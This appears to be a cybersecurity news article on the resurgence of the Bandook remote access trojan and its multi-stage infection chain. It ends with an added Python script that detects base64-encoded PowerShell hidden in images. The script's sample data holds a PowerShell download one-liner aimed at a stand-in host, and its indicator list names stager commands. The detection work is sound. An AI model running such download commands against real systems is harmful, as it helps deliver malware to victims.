The Bandook malware family, once thought to be extinct, is back and may be part of a larger operation that sells offensive hacking tools to governments and cybercriminal groups.
Several recent research papers released by Check Point Research indicate that Bandook, a 13-year-old Trojan, is regaining popularity across a wide range of targeted sectors and locations.
Dozens of variants of the malware have been observed over the past year in attacks against organizations in the United States, Singapore, Cyprus, Chile, Italy, Turkey, Switzerland, Indonesia and Germany.
Bandook was first discovered in 2007 as a remote access trojan and has been active for many years since.
The malware has reportedly evolved into a new variant that injects its payload into msinfo32.exe to run the malware and allow remote attackers to take control of an infected system.
Originally developed as a commercial RAT written in Delphi and C++, Bandook evolved into several variants over the years and eventually became available for download from the internet.
Bandook was originally developed as a commercial RAT by a Lebanese developer known as Prince Ali. Remote access trojans are commonly used to remotely manage infected computers without the consent of their users.
This malware is capable of a variety of malicious activities, including keylogging, audio and video capture, screenshot capture with upload to a remote server, and running various command shell programs.
Attackers can use hijacked accounts to spread malware by sending malicious files and links to every contact in the account.
Trojan horses are often used to spread further infections such as ransomware and crypto miners, since they can modify system settings as well as download additional malware; they are also commonly used to spread viruses and other malware.
During the last few years the malware had all but disappeared from the threat landscape, but it appears to have begun to resurface.
The infection chain delivered to a victim computer consists of three stages.
In the first stage, a lure document containing malicious, encoded VBA macro code drops two files into the local user folder.
The first is a PowerShell script; the second is a JPG file that contains a base64-encoded PowerShell script.
In the second stage, the base64-encoded PowerShell script stored in the JPG file is decoded and executed, and it downloads a zip file containing four files from cloud services.
Three of the four files are PNG images with RC4 functions hidden in the RGB values of their pixels.
From these files, an executable that acts as the Bandook loader is constructed.
In the final stage, the Bandook loader creates an Internet Explorer process and injects the malicious payload into it.
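The second stage described above hides a base64-encoded PowerShell script inside a JPG file. The following script is an added detection example written for this article; it is not code from the article, from Check Point Research, or from the Bandook operators. It scans an image file for long base64 runs, decodes them, and flags any that contain PowerShell indicators (as plain UTF-8 or as the UTF-16LE encoding PowerShell uses for encoded commands). The minimum run length, the indicator list and the sample JPG bytes are constructed assumptions, not artefacts from the real campaign.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional

# Substrings that commonly appear in PowerShell stagers. This is a constructed,
# illustrative list, not a signature published for Bandook.
POWERSHELL_INDICATORS = (
    "Invoke-Expression",
    "Invoke-WebRequest",
    "DownloadString",
    "DownloadFile",
    "FromBase64String",
    "New-Object",
    "-EncodedCommand",
    "Start-Process",
    "$env:",
)


def base64_runs(data: bytes, min_len: int = 40) -> List[bytes]:
    """Return every run of base64-alphabet bytes at least min_len long."""
    pattern = re.compile(rb"[A-Za-z0-9+/]{%d,}={0,2}" % min_len)
    return [m.group(0) for m in pattern.finditer(data)]


def decode_base64(blob: bytes) -> Optional[bytes]:
    """Decode a base64 run, repairing missing padding; None if it is not valid base64."""
    padded = blob + b"=" * (-len(blob) % 4)
    try:
        return base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None


def powershell_indicators(text: str) -> List[str]:
    """Case-insensitive search for the indicator substrings in decoded text."""
    lowered = text.lower()
    return [ind for ind in POWERSHELL_INDICATORS if ind.lower() in lowered]


def scan_image_for_embedded_powershell(data: bytes, min_len: int = 40) -> List[Dict]:
    """Report base64 runs inside an image whose decoded form looks like PowerShell."""
    findings = []
    for run in base64_runs(data, min_len):
        decoded = decode_base64(run)
        if decoded is None:
            continue
        # Try plain text first, then UTF-16LE (used by -EncodedCommand payloads).
        for encoding in ("utf-8", "utf-16-le"):
            text = decoded.decode(encoding, errors="ignore")
            hits = powershell_indicators(text)
            if hits:
                findings.append({
                    "offset": data.find(run),
                    "encoding": encoding,
                    "indicators": hits,
                    "script_preview": text[:80],
                })
                break
    return findings


# Constructed sample: a minimal JFIF header and EOI marker with a base64-encoded
# PowerShell download one-liner wedged between them (not a real Bandook file).
SAMPLE_SCRIPT = (
    "$u='http://example.invalid/stage2.zip'; "
    "Invoke-WebRequest -Uri $u -OutFile $env:TEMP\\s.zip"
)
SAMPLE_JPG = (
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"
    + b"\x00" * 32
    + base64.b64encode(SAMPLE_SCRIPT.encode("utf-8"))
    + b"\x00" * 16
    + b"\xff\xd9"
)

# Constructed benign sample: a long base64 run that decodes to ordinary text.
CLEAN_JPG = b"\xff\xd8\xff\xe0" + base64.b64encode(
    b"just some ordinary metadata text that is long enough to match"
) + b"\xff\xd9"


if __name__ == "__main__":
    for name, blob in (("SAMPLE_JPG", SAMPLE_JPG), ("CLEAN_JPG", CLEAN_JPG)):
        for finding in scan_image_for_embedded_powershell(blob):
            print(name, finding)
```

A run of at least 40 base64 characters is used so that short, legitimate fields such as the "JFIF" marker are ignored; tune the threshold and the indicator list to the environment, and treat a hit as a triage lead rather than proof of infection, since any PowerShell text embedded in an image is unusual but not inherently malicious.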
This Cyber News was published on www.cysecurity.news. Publication date: Mon, 25 Dec 2023 11:43:06 +0000